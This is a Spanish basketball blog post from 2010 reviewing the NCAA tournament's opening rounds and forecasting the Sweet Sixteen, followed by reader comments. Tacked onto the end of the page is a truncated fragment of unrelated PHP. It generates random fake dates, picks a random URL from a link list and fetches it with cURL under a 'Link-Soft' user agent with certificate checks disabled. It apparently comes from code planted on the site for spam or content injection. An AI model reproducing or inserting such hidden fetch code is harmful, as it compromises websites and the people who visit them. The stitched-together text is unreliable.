Sweet Sixteen

23 de March de 2010 por kantonyo

Puro espectáculo el que nos ha ofrecido este fin de semana el torneo final de la NCAA. Ha habido importantes decepciones como la protagonizada por los máximos favoritos, Kansas Jayhawks, que no supieron deshacerse de los chicos malos de Northern Iowa.  Sorpresas agradables como el éxito de la Universidad de Cornell, integrantes de la elitista Ivy League, que nos han demostrado que en el baloncesto americano no todo es físico. Grandes emociones con partidos decididos en los últimos segundos o con varias prórrogas como el que decidió el partidazo entre Michigan State y Maryland. Pero además el March Madness nos ha dejado claro que si de algo destaca esta competición es de ser la mayor cantera de este deporte.

A continuación, y en colaboración con Txusma, un resumen de lo que han dado de sí las dos primeras rondas y un pronóstico para las 2 siguientes.

East Regional

Kentucky avanza con paso firme por el torneo con dos claras victorias ante East Tennessee y Wake Forest. Las piezas claves de UK parecen encajar a la perfección: John Wall muy correcto y serio aunque poco participativo, un potente DeMarcus Cousins que demuestra que viene con muchas ganas al torneo, un talentoso Eric Bledsoe que fundió a los Buccaneers con 8 de 9 en triples y la experiencia de Patrick Patterson. Wake Forest fue pasada por encima por los Wildcats después de haber eliminado a Texas en el tiempo extra con una buena actuación de Al-Farouq Aminu.

La Universidad de Cornell, que pertenece a la prestigiosa Ivy League, ha sido una de las agradables sorpresas del torneo gracias a un elaborado juego de equipo. En su primer partido pudieron con los Owls de Temple desde principio a fin gracias al acierto en el tiro del forward Ryan Wittman y del buen manejo del juego de uno de los pocos jugadores negros de los Big Red, el base Louis Dale. Tampoco tuvieron grandes problemas para dar la sorpresa ante Wisconsin (4) de nuevo con la buena aportación de Wittman (24 puntos) y Dale (26 puntos). Wisconsin sufrió más de lo esperado para vencer a la débil Wofford sólo por cuatro puntos y pagó su mal juego contra Cornell. El alapívot, Jon Leuer, que venía de una lesión fue su mejor jugador promediando 21 puntos (57%) y 6 rebotes.

Los Huskies de Washington han demostrado a los jueces de la NCAA que su puesto 11º en la East Regional era totalmente erróneo. En su primer partido vencieron a Marquette  con una canasta en los últimos segundos de Quincy Pondexter en un encuentro muy igualado, donde Lazar Hayward fue el jugador más destacado en los Golden Eagles de Marquette. Más fácil lo tuvieron contra New Mexico (3) en la segunda ronda donde vencieron por 18 puntos. El juego interior con Pondexter y Bryan-Amaning fue la clave de esta victoria. También destacó el base Isaiah Thomas con 15 puntos y 7 asistencias. Isaiah nada tiene que ver con el histórico base de los Detroit Pistons, Isiah Thomas.

Al igual que Kentucky, los Mountaineers de West Virginia tampoco tuvieron grandes problemas para pasar a las semifinales regionales. Aunque en el primer partido contra la modesta Morgan State, Da’Sean Butler estuvo desaparecido, no fue así contra Missouri, donde el alero de 22 años tuvo una de las mejores actuaciones del fin de semana, con 28 puntos y 8 rebotes. Los otros dos forwards, Devin Ebanks y Kevin Jones también tuvieron actuaciones destacadas.

Kentucky (1) – Cornell (12): Eliminatoria interesante la que veremos en Syracuse. El prometedor talento de los Wildcats contra el vistoso juego que nos han ofrecido los Big Red. Habrá que seguir de cerca el duelo entre John Wall y Louis Dale. La clave podría estar en el poder físico de los jugadores interiores de UK. En condiciones normales no deberían tener problemas los de Calipari.

West Virginia (2) – Washington (11): A pesar del buen torneo de los Huskies, parece que esta eliminatoria será su techo este año. Quincy Pondexter no parece suficiente arma como para parar al trío interior de los Mountaineers. Los del estado de Washington deberán aprovechar las carencias en el tiro exterior de West Virginia para pasar a la siguiente ronda.

Pronóstico: Kentucky – West  Virginia / Final Four: Kentucky

South Regional

Los Blue Devils se han clasificado para las semifinales de la South Regional con absoluta comodidad. En primera ronda arrasaron con Arkansa-Pine Bluff por 29 puntos gracias sobre todo a la aportación del alapívot Kyle Singler con 22 puntos y 10 rebotes. En el siguiente partido, los Golden Bears de California sólo aguantaron los primeros cinco minutos al empuje de Duke. Esta vez los destacados fueron el base Nolan Smith y el pívot de 2,16 Brian Zoubek. La nota negativa del equipo fue el escolta Jon Scheyer que parece no estar en su mejor estado de forma, contra Cal se quedó en 1 de 11 en tiros de campo. California venía de ganar cómodamente contra Louisville con un buen partido de Theo Robertson, Jerome Randle y Patrick Christopher.

Vibrante partido el que nos ofrecieron Purdue contra Texas A&M que se decidió en el tiempo extra a favor de los Boilermakers. Purdue estuvo los últimos cuatro minutos del tiempo reglamentario sin anotar ni un solo punto permitiendo la remontada de los Aggies, a la postre inútil. Chris Kramer se convirtió en el héroe del encuentro gracias a la canasta decisiva y sus 17 puntos. E’Twaun Moore también fue importante aunque estuvo bastante fallón en el tiro. JaJuan Johnson no estuvo al mismo nivel que nos demostró ante Siena donde anotó 23 puntos y capturó 15 rebotes, quedándose en sólo 11 puntos y 3 rebotes. El alapívot de Texas A&M, Bryan Davis, fue el encargado de defender a Johnson con bastante éxito, capturando 15 rebotes. La principal figura de los Aggies, el base Donald Sloan estuvo por debajo de sus expectativas.

Los Monarchs de Old Dominion (11) a punto estuvieron de dar la campanada metiéndose en las semifinales regionales. En la primera eliminatoria dejaron fuera a los Irish de Notre Dame con una buena actuación del alero Frank Hassell. Luke Harangody, alapívot mediático de Notre Dame, se quedó en unos ridículos cuatro puntos dando a entender que no llegaba bien de su lesión. En la segunda ronda contra Baylor (3), Old Dominion estuvieron cerca de materializar la machada, después de una meritoria remontada. LaceDarius Dunn, base de los Bears de Baylor estuvo magistral con 26 puntos. El pívot, Ekpe Udoh, aspirante a primera ronda del draft no pudo repetir su buena actuación contra Sam Houston con 20 puntos y 13 rebotes, quedándose en sólo 8 puntos y 4 rebotes.

Omar Samhan, pívot de Saint Mary’s, se ha convertido en el gran protagonista individual de la primera fase del torneo gracias a dos actuaciones increíbles. Contra Richmond (7), llevó a los Gaels a una victoria sorprendentemente cómoda con 29 puntos y 12 rebotes. Los Gaels capturaron 39 rebotes contra los 16 de los Spiders gracias sobre todo al pundonor de Omar. En la segunda ronda, Omar se superó a sí mismo con 32 puntos (13 de 16) y 7 rebotes en la victoria contra el segundo cabeza de serie de la división, Villanova. Los guards, Mickey McConnell y Matthew Dellavedova fueron el complemento perfecto para Samhan. Dellavedova, jugador de primer año nos recordó bastante al español Raúl Lopez en sus movimientos. Los Wildcats de Villanova se dejaron sorprender ante Saint Mary’s después de una mala actuación ante la débil Robert Morris donde a punto estuvieron de caer eliminados. Scottie Reynolds pasó con más pena que gloria por el torneo, con 4 canastas conseguidas sobre 26 tiros intentandos (15%).

Duke (1) – Purdue (4): Viendo la facilidad que ha tenido Duke para imponerse en sus eliminatorias y las carencias que ha mostrado Purdue tras la lesión de Robbie Hummel, los Blue Devils tienen todas las papeletas para llegar a la final de South Regional.

Baylor (3) – Saint Mary’s (10): Omar Samhan será la gran atracción de esta eliminatoria. Esta vez tendrá que medirse ante uno de los pívots más prometedores del año: Ekpe Udoh. ¿Será capaz de seguir con su rendimiento?. El otro gran duelo estará en el perímetro, Dunn y Carter contra McConnell y Dellavedova. Baylor está en una gran momento de forma, en los últimos doce partidos sólo han perdido dos, pero hay posibilidades para la sorpresa.

Pronóstico: Duke – Saint Mary’s / Final Four: Duke

MidWest Regional

Sin duda, la gran noticia de la MidWest ha sido la eliminación de uno de los grandes favoritos al título, los Kansas Jayhawks, a manos de los Panthers de Northern Iowa. Ya en el primer partido los pupilos de Bill Self las habían sufrido ante la pequeña universidad de Lehigh y necesitaron de un gran Marcus Morris para superar la eliminatoria. En segunda ronda el escolta, hijo de un ex-jugador de voleyball iraní, Ali Farokhmanesh, fulminó a los máximos favoritos con una triple a falta de 4 segundos para el final. Era la confirmación de la debacle de los Jayhawks que habían jugado un pobre partido con Cole Aldrich como jugador más destacado con 13 puntos y 10 rebotes.

Michigan State y Maryland disputaban el partido de segunda ronda con distintas sensaciones. Si bien los Spartans sufrieron, y mucho, ante New Mexico State y necesitaron del mejor Kalin Lucas para pasar la eliminatoria, los Terrapins se deshacieron con más facilidades de las previstas de Houston con Greivis Vazquez cuajando una completísima actuación. El partido que les enfrentó no pudo ser más emocionante con la lesión de Kalin Lucas (que estará entre 4 y 6 meses fuera de las canchas), hasta 4 cambios de líder en los últimos 35 segundos y un triple ganador sobre la bocina de Korie Lucious.

Otra de las grandes decepciones de esta March Madness ha sido la universidad de Georgetown. Lo que se preveía como una fácil eliminatoria frente a Ohio acabó convirtiéndose en una dolorosa derrota en la que los Hoyas permitieron nada más y nada menos que 97 puntos. Greg Monroe, a pesar de sus 19 puntos, 13 rebotes y 6 asistencias, no jugó un buen partido cometiendo 7 pérdidas de balón algunas de ellas muy ridículas. La derrota escuece más teniendo en cuenta que Ohio fue presa fácil de la Tennesse, que tras eliminar con ciertas dificultades a San Diego State en primera ronda, no tuvo ningún problema en dejar a la cuneta a los Bobcats.

Los que no han fallado han sido los jugadores de Ohio State. En el primer partido, y a pesar de la horrible noche en el tiro de su estrella Evan Turner, se impusieron con facilidad a la universidad de Santa Barbara y en el segundo tampoco sufrieron mucho para imponerse a Georgia Tech. Turner se resarció de su pobre partido de primera ronda y se quedó a un solo rebote y una asistencia del triple doble aunque es bien cierto que también se quedó a una sola pérdida de completar el cuádruple. De todas maneras ya hay gente que pone en duda la primera elección de John Wall en el draft del próximo año.

Northern Iowa (9) – Michigan State (5): La baja de Kalin Lucas podría marcar el devenir del partido pero los Spartans supieron sobreponerse a ella en su gran partido frente a Maryland, y nada hace pensar que no vuelvan a hacerlo frente a un rival teóricamente inferior a los Terrapins. De todas maneras más les vale no despistarse ni un segundo.

Tennesse (6) – Ohio State (2): Con todo lo que ha llovido en Tennesse haber llegado hasta aquí ya supone todo un triunfo para el equipo de Bruce Pearl pero seguro que no se contentaran. De todas maneras Evan Turner es mucho Evan Turner.

Pronóstico: Michigan State – Ohio State / Final Four: Ohio State

West Regional

En la West Regional el favorito camina con paso firme. Con Wesley Johnson liderando al equipo, Syracuse se impuso de manera muy cómoda a Vermont en primera ronda y de manera más cómoda aún a Gonzaga en el siguiente partido. El ex de Iowa State, que sube en los mocks como la espuma, se fue a los 31 puntos y 14 rebotes en una actuación prácticamente inmaculada.

El siguiente partido los disputará frente la universidad de Butler que dejó en la cuenta en primera ronda a UTE a base de triples y que en segunda ronda venció con grandes apuros a los sorprendentes Racers de Murray State. Éstos se habían cargado a Vanderbilt en primera ronda y a punto estuvieron de dar otra gran sorpresa frente los Bulldogs. Danero Thomas se convirtió instantáneamente en héroe tras la canasta sobre la bocina que permitía a su universidad pasar ronda por primera vez desde 1988.

En la otra parte del cuadro Kansas State también llega de manera apabullante al Sweet Sixteen. Si en primera ronda se impusieron con excesiva facilidad a North Texas, en segunda apretaron los dientes para vencer a los Cougars de Brigham. Como vaticinábamos, Daniel Clemente y sobretodo Jacob Pullens fueron claves, anotando el segundo 31 puntos en el segundo partido. El primer día, los Cougars habían vencido a los Gators de la mano de Jimmer Fredette inconmensurable.

Y el cuarto equipo es un invitado un tanto inesperado ya que poca gente esperaba que Xavier se impusiera a los Panthers de Pittsburg. Jordan Crawford se hizo famoso en su día por machacar por encima de Lebron James pero ahora será además famoso por sus buenas actuaciones de esta March Madness. El primer día le endosó 28 puntos a Minnessota y el segundo 27 a Pittsburg.

Syracuse (1) – Butler (5): Ya pronósticamos esta semifinal en el primer análisis de la March Madness y como somos muy coherentes seguimos considerando a Syracuse como el máximo favorito para llegar a la Final Four. Los Bullgdogs necesitarían jugar por encima de sus posibilidades para tener opciones reales de victoria.

Xavier (6) – Kansas State (2): A pesar del buen nivel de sus bases, la inexperiencia y los nervios podrían jugar una mala pasada a los Wildcats ya que no llegaban a esta ronda desde 1988. En cambio Xavier parece más acostumbrado a estas lides en estos últimos años y Crawford está a gran nivel. Nos la jugamos por la sorpresa.

Pronóstico: Syracuse – Xavier / Final Four: Syracuse

Comenta

23 comentarios a esta entrada

  1. sayim dice:
    #1

    Pedazo de análisis y pedazo de trabajo que os estais cascando con la NCAA. Mi mas sincera enhorabuena, no contentos con dar la mejor información de la NBA en español, ahora también lo hacéis de la liga universitaria…
    Lo dicho, seguid así

      Citar

  2. TheDeerHunter dice:
    #2

    Sin palabras señores, me quito el sombrero.
    Casi me caigo de la silla con lo de Isaiah Thomas.
    También me han llamado la antención los brazacos del tal DeMarcus Cousins.

    El problema es que soy un completo ignorante en la materia pero da gusto aprender y seguir la NCAA con vosotros.

      Citar

  3. kantonyo dice:
    #3

    El objetivo principal es que los aficionados a la NBA vayan conociendo alguna de las futuras estrellas y para que nos vayan sonando de cara al próximo draft. Tambien viene de lujo como base de datos, para dentro de unos años caerse por estos articulos y ver como hablabamos de un tal John Wall, “MVP del 2016” hace seis años cuando nadie le conocia…

    Si ya de paso alguien se engancha a la competición, pues de lujo!

      Citar

  4. max dice:
    #4

    Me sumo a las felicitaciones por este análisis tan brutal y por este nivel de conocimientos que teneis y que compartís con profanos en la NCAA. Ahora cuando llegue el draft sabremos un poco más a que atenernos.
    Por otra parte, es curiosa la historia de la Ivy League. Hace poco leí que la Ivy League la conforman universidades de donde salen la élite económica y política de USA y que por ello la parte deportiva es poco importante, no conceden becas por deporte y por ello las grandes figuras de los college no van ahí. Por ello sorprende lo que está haciendo Cornell, de hecho desde el año 1998 (Princeton) ningún equipo de la Ivy League había superado una ronda del March Madness y Cornell ya ha superado dos. A ver dónde llegan….

      Citar

  5. kantonyo dice:
    #5

    Efectivamente Max, la Ivy League la conforman ocho universidades privadas: Brown, Columbia, Cornell, College, Harvard, Pensilvania, Princeton y Yale. Todas ellas de gran prestigio academico y social. Es llamada así por que sus edificios de corte clásico británico estan cubiertos por hiedras (Ivy). Es la unica conferencia que no tiene torneo de playoffs, el ganador se dice a través de la liga regular, por eso el apellido de League.

    A pesar de que poca gente confiaba en los Big Red, han demostrado que son un equpo muy trabajado tacticamente, muy bien plantado y con jugadores que tienen muy bien definidos sus roles, han ganado sus dos partidos con demasiadas autoridad a pesar de no salir como favorito en ninguno de ellos.

    Su próximo partido será contra Kentucky, después de la eliminación de Kansas, los grandes favoritos junto con Duke. Deportivamente será David contra Goliat, todo lo contrario económicamente. Cornell es la 18ª con más presupuesto de USA en cambio Kentucky (pública) es la 84º.

      Citar

  6. Txusma dice:
    #6

    Curioso: Con los impuestos que paga Cornell se dan las becas para que los jugadores se vayan a Kentucky…

      Citar

  7. RusticoColorao dice:
    #7

    Buen análisis Kantonyo. Este año al estar perdido por el mundo casi no puedo ni seguir esta maravillosa locura. La sorpresa de Northern Iowa (otro fan de Lucas O’Rear), el último minuto del Maryland-Michigan State… qué torneo más bonito.

    La verdad que casi todo el mundo piensa que los restantes Seed #1 irán a la Final Four (Kentucky, Duke, Syracuse)… y a ellos se le unirá Ohio State (Seed #2). Ojalá tengamos alguna sorpresa más. Yo creo (y lo pensaba desde el inicio) que es el año de Kentucky. A mí me parecen un equipazo. El que no me acaba de convencer es Duke… será que soy un Tar Heel acérrimo.

      Citar

  8. Love Denise dice:
    #8

    muy buen articulo, felicidades a kantonyo
    no he podido ver a johny wall todavía? es verdad que es tan bueno como lo pintan? o va a ser algún beasley? (en cuanto a rendimiento me refiero, no a tipo de juego)

      Citar

  9. kantonyo dice:
    #9

    a Txusma tambien hay que felicitarlo, que lo hemos hecho a medias!

    Es muy díficil saber que va a pasar con John Wall, pero por ahora me ha dado sensación de que tiene la cabeza muy amueblada. Al igual que veo a Cousins menos maduro, más cabeza-loca. Digo esto pq yo no había visto a John Wall antes de la NCAA, y ya vino como una estrella, con el primer puesto del draft casi ganado, y me ha sorprendido en este aspecto.

    Va a tener una prueba muy exigente contra los guards de Cornell, que saben a lo que juegan, con mucho oficio.

      Citar

  10. sayim dice:
    #10

    No es por dudar de vosotros, pero estais seguros de que Isaiah Thomas no tiene ninguna relación con el mítico jugador de los Pistons?? Es que leyendo el blog de 13t ( http://www.marca.com/blogs/13t/ ) dice que son padre e hijo…

    Un saludo

      Citar

  11. RusticoColorao dice:
    #11

    Joder Txus, ¿ya sabes hasta de NCAA? Este año al rookie lo escoges tú 😛
    Compa te tengo abandonado. A ver cuando coincidimos y nos ponemos un poco al día.

      Citar

  12. max dice:
    #12

    Sayim, en el mismo blog de Trecet hay un comentario que lo corrige y explica que su padre se llama James y que le puso a su hijo el nombre de Isaiah porque perdió una apuesta con un amigo viendo las finales del 1989 entre Lakers y Pistons (A la madre no le hizo mucha gracia…)
    Así pues, punto para Kantonyo y Txusma.

      Citar

  13. sayim dice:
    #13

    No lei los comentarios, lo siento. Aun así reiterar mi enhorabuena, esta confusión da una idea del nivelazo del blog…

    Curiosa anécdota la del nombre del chaval.

      Citar

  14. sergio dice:
    #14

    Joder con el padre, no? ya podia haberse apostao unas cervecitas… Aunque quizas ese nombre le motivo a la hora de practicar baloncesto. Parece que a su familia le gusta este deporte al menos.

    Me uno a los agradecimientos por esta informacion porque soy otro “paleto” (me acuerdo de la pregunta del trivial) de la liga universitaria. Desde que habeis puesto esto me he tragado un par de partidos en diferido y la verdad que el nivel de competicion es altisimo. Me encanta que haya tantas sorpresas y que los partidos se decidan mas por juego en equipo que por estrellas (al menos en rondas bajas).

    Seguro que en un futuro, en vez de observar lo que comentabamos sobre futuros MVP’s, estamos comentando los chascos que nos den algunas promesas de este año.. Pensemos que con que salgan 6 o 7 jugadores titulares en franquicias ya podemos darnos con un canto en los dientes.

    Enhorabuena por el trabajo Kantonyo y Txus. Me gustaria proponeros un apartado con los partidos mas interesantes de cada jornada y los supuestos de las siguientes. Asi sabria mas donde esta la miga…

      Citar

  15. sergio dice:
    #15

    Me voy a decidir por el Xavier-Kansas State.. y el Baylor-St.Mary. ¿Como lo veis “NCAAdictos”?

      Citar

  16. Txusma dice:
    #16

    Ese Xavier-Kansas State lo veo bastante emocionate y de hecho yo aposté por los teóricamente inferiores jugadores de Xavier. Y ver a Jamal Crawford tb es una aliciente.
    Y ahora mismo el partido de St. Mary debería ser de visionaje obligatorio para descubrir a Omar Samhan

      Citar

  17. kantonyo dice:
    #17

    Lo de los periodistas de Marca o As es la pera, aunque se llamen Trecet (al que le admiro, a pesar de que es un poco bocazas) . Anda que no comenten errores con la NBA para no hacerlo con la NCAA. Se supone que son ellos los que deben corroborar noticias o datos, que les pagan por ello, los demás lo hacemos por hobby.

    Por cierto en el anterior pronóstico acertamos 11 de 16, no está nada mal teniendo en cuenta las grandes sorpresas que hubo.

      Citar

  18. TheDeerHunter dice:
    #18

    Pues de premio el año que viene tendrás que hacer pronósticos NBA… aunque si son iguales que el de los Cavs del año pasado… ;D

      Citar

  19. kantonyo dice:
    #19

    No tranquilo, que en la NBA ya me he dado el batacazo tambien este año como hemos podido comprobar en la porra. jajajaja

      Citar

  20. Txusma dice:
    #20

    Sergio, no te habra defraudado para nada el Xavier-Kansas State, eh? Partidazos de Holloway por un lado y de Pullen por el otro.
    Pero el sorpreson, sin duda, la derrota de Syracuse a manos de Butler con Gordon Hayward, clon de Dunleavy, como hombre mas destacado.
    Y Kentucky arrasó a Cornell con John Wall cuajando un partido muy completo (8-7-8) y Demarcus Cousins jugando un buen partido.

      Citar

  21. sergio dice:
    #21

    Txusma… si todos los partidos de la NCAA son como el de ayer… voy a pasar de ver NBA mientras dure la “March Madness”. Siempre ha sido el ambiente lo que mas me ha gustado de la NCAA y la verdad es que es la unica forma de ver gente animando hasta los Playoffs (exceptuando partidos entre los 6 primeros de la liga)

      Citar

  22. kantonyo dice:
    #22

    Ya tenemos a los cuartofinalistas del March Madness.

    Ayer, otro de los favoritos cayó eliminado. Los Buckeyes de Ohio State perdieron contra Tenneessee a pesar del gran partido de Evan Turner con 31 puntos, 7 rebotes y 5 asistencias.

    Baylor pasó por encima de Saint Marys, en donde Omar Samhan no pudo estar al nivel que habia ofrecido, y en donde los guards de Baylor, Dunn y Carter, tuvieron una gran actuación.

    La otra gran sorpresa del torneo, Los Panthers de Northern Iowa perdieron ante Michigan State sin Kalin Lucas, lesionado. Los Spartans otro año más están en lo más alto sin hacer ruido.

    Y los Blues Devils siguen con paso firme eliminando a Purdue con una gran actuación de Kyle Singler. Posiblemente diga una burrada pero este chico me recuerda muchísimo a un tal Dirk Nowitzki

    Por lo tanto las finales regionales están así:

    MidWest: Michigan St (5)- Tenneessee (6) Domingo 18:20
    West: Butler (5) – Kansas State (2) Sabado 21:30

    East: Kentucky (1) – West Virginia (2) Sabado 23:55
    Sout: Duke (1) – Baylor (3) Domingo 21:05

      Citar

  23. RusticoColorao dice:
    #23

    Madre mía que malo soy… Kentucky (#1) – Syracuse (#1) y Ohio State (#2) eliminados. Sólo queda un número 1 (Duke). Pero, por favor, que estos no ganen…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>